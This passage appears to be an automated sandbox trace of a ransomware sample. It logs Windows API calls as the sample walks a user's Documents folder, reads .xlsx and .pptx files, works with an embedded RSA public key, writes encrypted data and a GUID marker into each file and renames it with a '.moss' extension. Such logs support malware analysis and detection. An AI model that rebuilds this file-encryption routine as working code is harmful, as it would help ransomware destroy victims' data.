hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0169.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.581] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.581] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.581] PathFindFileNameW (pszPath="") returned="" [0169.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0169.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.581] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.582] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645bc00, ftCreationTime.dwHighDateTime=0x1d5dc28, ftLastAccessTime.dwLowDateTime=0xe4d16f0, ftLastAccessTime.dwHighDateTime=0x1d57e34, ftLastWriteTime.dwLowDateTime=0xe4d16f0, ftLastWriteTime.dwHighDateTime=0x1d57e34, nFileSizeHigh=0x0, nFileSizeLow=0x16d67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0ekjNGhL.xlsx", cAlternateFileName="0EKJNG~1.XLS")) returned 1 [0169.582] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ekjNGhL.xlsx") returned=".xlsx" [0169.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ekjNGhL.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0ekjnghl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.582] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=93543) returned 1 [0169.582] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.586] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x16d41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.586] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.587] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x16d67, lpOverlapped=0x0) returned 1 [0169.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.588] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.590] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.590] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.590] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.590] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.590] GetLastError () returned 0x0 [0169.590] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.590] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.590] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.590] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.590] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.592] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.593] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x16d67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.593] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.593] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.593] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.593] CloseHandle (hObject=0x664) returned 1 [0169.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a98 | out: hHeap=0xcd0000) returned 1 [0169.596] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ekjNGhL.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0ekjnghl.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ekjNGhL.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0ekjnghl.xlsx.moss")) returned 1 [0169.597] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.597] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.597] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.599] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16db0660, ftCreationTime.dwHighDateTime=0x1d5d825, ftLastAccessTime.dwLowDateTime=0x6505fbe0, ftLastAccessTime.dwHighDateTime=0x1d5d872, ftLastWriteTime.dwLowDateTime=0x6505fbe0, ftLastWriteTime.dwHighDateTime=0x1d5d872, nFileSizeHigh=0x0, nFileSizeLow=0x833f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0f4pt.pptx", cAlternateFileName="0F4PT~1.PPT")) returned 1 [0169.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.599] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0f4pt.pptx") returned=".pptx" [0169.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0f4pt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0f4pt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.599] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=33599) returned 1 [0169.599] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.602] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8319, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.603] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.604] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.604] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x833f, lpOverlapped=0x0) returned 1 [0169.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.604] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.605] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.606] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.606] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.606] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.606] GetLastError () returned 0x0 [0169.606] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.606] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.606] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.606] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.606] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8340) returned 0x3b48820 [0169.606] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45788 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbee8 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b457d0 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf00 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf30 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf48 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.607] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b50b68 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf30 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf48 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50b68 | out: hHeap=0xcd0000) returned 1 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbf48 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbf30 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.607] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf48 | out: hHeap=0xcd0000) returned 1 [0169.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf30 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.608] GetCurrentThreadId () returned 0x324 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd326c0 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.608] GetCurrentThreadId () returned 0x324 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf30 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 